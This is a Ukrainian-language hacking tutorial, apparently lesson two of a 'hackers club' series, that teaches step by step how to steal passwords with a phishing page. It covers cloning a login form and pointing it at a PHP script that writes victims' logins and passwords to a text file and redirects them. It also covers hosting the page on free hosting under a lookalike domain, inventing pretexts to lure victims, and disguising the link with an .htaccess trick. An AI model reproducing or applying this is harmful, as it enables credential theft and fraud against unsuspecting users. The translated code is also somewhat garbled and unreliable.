Фейк | клуб Хакерів

урок 2

Наш минулий урок носив підготовчий характер. Тепер же настав час навчитися красти (далі запозичувати) чужі паролі. У цьому уроці ви дізнаєтеся один з найпростіших способів злому. На жаль, все відразу я розповісти не зможу, ну і без невеликого передмови обійтися теж не вийде, а тому ...

Про методи запозичення

Взагалі існує чимало способів пізнавати паролі. Один з них (найпростіший на мій погляд) ми розглянемо в цьому уроці. Можливо, хтось скаже, мовляв, рано ще, всього-то другий урок ... повірте, нічого складного тут немає, а розповісти про це раніше я вирішив щоб підігріти інтерес читачів.

Напевно багато хто прийшов сюди з думками на кшталт «а як зламувати персів в Вовці \ Линух?», «Як зламувати вконтакте \ пошту \ аську?» І т.п. Хотілося б заздалегідь попередити що мислити треба ширше і думати про те як дізнаватися паролі взагалі ( «Думки глобально, дій локально»), а не тільки від якогось певного сайту або сервера. Важливо знати методики злому і вміти застосовувати потрібну в залежності від ситуації. Той спосіб, про який я хочу вам розповісти, по суті своїй є не зломом, а крадіжкою паролів користувача. Робити ми це будемо за допомогою фейк.

Що таке фейк

Фейк (від англ. Fake - підробка, фальшивка) - це підроблена веб-сторінка (зазвичай з формою авторизації), яка виглядає так само як і оригінал, але створена з метою передачі вводяться на ній паролів творцеві. Іншими словами, це сторінка авторизації (входу), яка виглядає так само як і від мене вимагається залогуватись на справжній сайт. Ця сторінка була скопійована з реальною, трохи змінена (логіни та паролі, введені в форму входу, зберігаються на хості) і розміщена на безкоштовному хостингу. Тобто коли ви вводите пароль на такій сторінці, він зберігається, а вас перекидає на справжній сайт.

Робимо свій фейк

Тепер непогано було б розглянути сам процес створення таких сторінок (фейків), а саме дізнатися докладніше про всі вищезазначених операціях, що проводяться з реальними сторінками. Як було сказано раніше, це копіювання, зміна і розміщення.
Копіювання. Це найперший етап, який ми виробляємо для того, щоб наша сторінка виглядала ідентично реальної. Щоб користувач, що зайшов туди, побачив звичну і знайому форму входу і без зайвих роздумів про адресі сторінки ввів свій логін і пароль (і подарував їх нам ). Отже, як же будемо копіювати? Просто відкриваємо потрібний нам сайт в браузері opera (саме opera, так як вона збереже сторінку точно так як нам потрібно!), Заходимо на сторінку авторизації (тобто щоб у нас форма входу була на головному плані і щоб користувач не забув ввести пароль ) І зберігаємо цю сторінку: файл - зберегти як ... У вікні вибираємо тип файлу: HTML-файл з зображеннями, ім'я: index. Краще відразу створити для фейк окрему папку і туди скидати все потрібні для нього файли (в процесі створення у нас з'явиться ще кілька). Тепер нам потрібно буде відкрити вихідний код збереженої сторінки і розібратися в ньому. Для цього відкриємо файл блокнотом, але краще скачайте таку чудову програму як NotePad ++ . Я сам їй завжди користуюся, так як річ це дуже зручна, універсальна і набагато краще блокнота! (скоро самі зрозумієте чому. Я просто рекомендую: good :) Отже, відкриваємо наш збережений index.htm текстовим редактором! Не лякайтеся, це зовсім не так страшно як здається!
По вуха в html. Те що ви бачите називається html кодом сторінки (він же вихідний код сторінки, він же просто код ). Коли ви зберігали сторінку, поруч з полем для введення логіна і пароля напевно були підписи (логічно припустити що там було написано «логін», «пароль» ). Ось по ним і будемо орієнтуватися. Шукаємо серед всього цього неподобства такі слова. Поруч з ними на сторінці у нас розташовувалися поля введення логіна і пасу. В html коді вони будуть виглядати приблизно ось так:
<input type = "text» name = "login" value = "" ......
<input type = "password» name = "password» ......
імена полів (виділені жирним, в коді йдуть після «name =") не завжди будуть саме login і password. Десь це можуть бути e-mail і pass, а десь і username, parol. Залежить від фантазії тих, хто коділ сторінку Для нас важливо вміти побачити імена цих полів серед всього іншого коду! Ще одна підказка: блок з написами «логін», «пароль» і формами введення майже завжди знаходиться в тезі <form>. Наступним дією ми повинні запам'ятати (а краще тимчасово записати) імена цих полів. Далі ми будемо їх використовувати в одному скрипті (який і буде займатися записом паролів ). Отже, записали ... шукаємо трохи вище очима тег <form> (він повинен бути приблизно на початку рядка). Після нього йдуть деякі параметри самої форми (в цьому ж рядку). Приблизно таке:
<Form name = "login" action = "users / passcheck.php» method = "post» onsubmit = "return check ();">
Нас тут цікавить все що підкреслено, а саме параметр action. для того щоб наш фейк заробив, нам потрібно після введення користувачем значення запустити наш певний хитрий скрипт (добре, добре, скоро розповім що за скрипт ). Припустимо, у нас він буде називатися login.php. Ось і прописуємо параметру action значення login.php (якщо параметраaction там немає - введіть його самі: action = "login.php»). Так само варто звернути увагу на параметр method (в тій же сходинці що form іaction): він може мати значення post або get. Для роботи нашого скрипта там повинно бути post (якщо не так - міняємо!). З цим файлом у нас все. Зберігаємося і закриваємо.
Цей загадковий скрипт ... Як і обіцяв, зараз розповім про призначення загадкового скрипта, вже не один раз згаданого мною раніше в цьому уроці. Він буде виконувати функцію перехоплення і записи введених в поля логіна і пароля. Кажучи російською мовою, цей скрипт запише логін і пароль обманутого користувача. Сам скрипт не дуже великий і не складний, написаний на мові php (в минулому уроці я про нього вже згадував) і виглядає ось так:

Code

<? PHP
$ Log = $ _POST [ 'login'];
$ Pass = $ _POST [ 'password'];
$ Log = fopen ( «database.txt», »at»);
fwrite ($ log, "\ n $ Log: $ Pass \ n");
fclose ($ log);
echo "<html> <head> <META HTTP-EQUIV = 'Refresh' content = '0; URL = http: //lleo.aha.ru/na/ '> </ head> </ html> »;
?>

Зараз розберемося що до чого ...

Отже, відредагували скрипт як нам потрібно, зберегли в файл з ім'ям login.php (зверніть увагу на розширення, а то ще збережіть як login.php.txt ) В папку з фейком.

Відео по пройдених етапів уроку додається!

Тестування. Ось тут нам і стане в нагоді наш локальний сервер! Запускайте все це добро (крім MySQL, зараз він нам не знадобиться) і закидайте файли з папки з фейком на серв (папка htdocs, пам'ятаєте?). Відкривайте localhost в браузері. Повинна завантажитися збережена нами сторінка. На ній вписуйте логін і пароль (що завгодно англійськими літерами та цифрами). Після натискання на enter у вас повинна відкритися сторінка, зазначена в скрипті (пам'ятаєте про шостий рядок, так?), А введені логін і пароль повинні були записатися в зазначений в третьому рядку файл. Відкриваємо його, перевіряємо. Якщо ви все зробили правильно і перевірка пройшла як по маслу, то можна переходити до наступного етапу - заливці на хост.
Розміщуємо фейк в Інтернеті. Все що нам для цього знадобиться - безкоштовний хостинг з підтримкою php (наприклад, freehostia ). Php нам потрібен для того, щоб працював наш скрипт, а безкоштовний вибираємо зі зрозумілих причин. Нам необхідно зареєструвати домен на цьому хості (сторінку в інтернеті) з адресою (назвою), схожим на адресу сторінки, яку ми підробляли. Робите ви, наприклад, фейк сайту mail.ru, значить треба зареєструвати щось на зразок mait, nail, moil, majl і т.п. (можна і mail якщо на хості вільним буде). При цьому хостер надасть вам домен виду mail.freehostia.com, де mail - ім'я, яке ви реєстрували; freehostia - домен другого рівня (назва хоста), від якого ви нікуди не подінетеся через безкоштовності хостингу; com - доменна зона, в якій буде розташований ваш сайт (деякі хостери надають можливість її вибору). Як ви зрозуміли, ми повинні зареєструвати адресу, максимально схожий на реальний, щоб це не впадало користувачеві в очі. Зареєструвалися? Заходимо в панель управління нашим сайтом і повторюємо процедуру з тестуванням на localhost-e, але ...

Увага! З трьома маленькими відмінностями:

Наш фейк готовий! Залишилося тільки зробити так, щоб користувач зайшов туди і ввів свій пароль.

Заманюємо жертву на фейк. На цьому етапі нам доведеться імпровізувати. Для початку, потрібно придумати привід, під яким жертва повинна пройти по посиланню і ввести свій логін і пароль на відповідному ресурсі. Тут все залежить від тематики підробленого вами сайту і інтересів жертви. Власне, як ви будете впарювати посилання, можете придумати тільки ви самі.
Залишається один маленький нюанс: адреса нашого фейк не відповідає адресою реального ресурсу, і жертва може вам просто не повірити. Тут є два варіанти. Перший - сказати що це, нібито, альтернативна сторінка авторизації або сторінка для адмінів (що різко збільшить бажання жертви там авторизуватися). Другий варіант - після адреси фейк приписати який-небудь цікавий текст. Зараз поясню. Припустимо, адреса реального сайту був http://site.ru/ , А адреса створеного нами фейк - http://site.ourhoster.com/ . Виглядає якось палевно. Щож, зробимо нашу адресу таким: http://site.ourhoster.com/RAZDACHA_UINOV_6-dig-BESPLATNO ! і дамо це посилання жертві під відповідним приводом. Ну хто ж буде дивитися на першу частину адреси? Для того, щоб таке посилання спрацювала, потрібно залити на хост всього один файл - htaccess (заливати прямо в кореневу папку). Тепер після адреси (тільки через слеш /) можна писати будь-який текст (хоч з пробілами, хоч російськими буквами), а жертва все-одно потрапить на фейк.

Підведемо підсумок